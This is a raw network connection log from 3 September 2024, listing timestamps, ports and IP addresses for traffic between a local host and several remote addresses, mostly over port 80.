Sep 3, 2024 17:13:19.196544886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196544886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196584940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196610928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196866989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196877956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196926117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197019100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197031021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197046995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197058916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197068930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197093010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197114944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197161913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197173119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197184086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197202921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197243929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197307110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197319031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.197356939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.197356939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.200995922 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.245594978 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.251580000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.276282072 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.280282974 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:19.285927057 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.286389112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286401033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286412001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286483049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286483049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286501884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286514044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286524057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286536932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286561012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286561012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286591053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286766052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286777973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286793947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286806107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286811113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286817074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286829948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286839962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286850929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286859989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286859989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286863089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.286902905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.286931038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287108898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287120104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287149906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287163973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287244081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287255049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287265062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287271023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287276030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287281036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287286997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287288904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287292957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287298918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287305117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287309885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287316084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287442923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287442923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.287971973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287987947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.287997961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288009882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288027048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288036108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288037062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288049936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288060904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288068056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288077116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288088083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288091898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288100004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288110971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288111925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288122892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288125038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288136005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288146973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288157940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288171053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288180113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288180113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288188934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288202047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288214922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288240910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288248062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288904905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288916111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288925886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288937092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288948059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288959026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288970947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288979053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288979053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.288984060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.288996935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289007902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289020061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289028883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289028883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289031029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289043903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289055109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289058924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289067030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289078951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289088011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289088964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289102077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289114952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289115906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289125919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289164066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289164066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289851904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289869070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289880037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289891005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289902925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289907932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289915085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289920092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289926052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289937973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289947033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289958000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289968014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289978027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.289978981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289978981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.289988995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290002108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290002108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290016890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290028095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290034056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290035009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290040016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290052891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290066004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290101051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290771008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290782928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290793896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290805101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290816069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290827036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290838003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290848970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290858030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290858984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290872097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290883064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290890932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290890932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290894032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290905952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290908098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290918112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290929079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290940046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290949106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290949106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290952921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290967941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.290968895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290981054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290992022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.290993929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.291011095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.291042089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.291042089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.291501045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.291512966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.291570902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.357597113 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.359563112 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.364928961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.382426977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382452965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382464886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382496119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.382512093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.382566929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382579088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382590055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382601023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382612944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382647038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.382647038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.382863045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382874966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382885933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382898092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382910013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.382929087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.382946014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383102894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383114100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383125067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383137941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383155107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383164883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383178949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383179903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383193016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383203983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383212090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383212090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383214951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383228064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383254051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383263111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383692980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383703947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383714914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383724928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383735895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383752108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383763075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383774042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383785963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383786917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383786917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383796930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383809090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383820057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.383831024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383831024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383850098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.383865118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384263992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384274960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384284973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384294987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384306908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384331942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384361029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384407043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384418011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384428024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384443998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384455919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384462118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384465933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384490967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384511948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384552956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384565115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384576082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384588957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384602070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384610891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384622097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384632111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384643078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384649038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384649038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384654999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384666920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384679079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384687901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384691000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384706974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384711027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.384752989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.384752989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385428905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385446072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385458946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385468960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385482073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385488033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385488033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385493040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385504961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385514975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385526896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385534048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385534048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385538101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385549068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385554075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385560989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385574102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385585070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385595083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385603905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385616064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385622978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385622978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385628939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385641098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385652065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.385664940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385664940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.385688066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386383057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386400938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386410952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386421919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386431932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386437893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386441946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386452913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386456966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386468887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386478901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386488914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386498928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386501074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386501074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386511087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386522055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386523962 CEST	49730	80	192.168.2.8	52.212.52.84
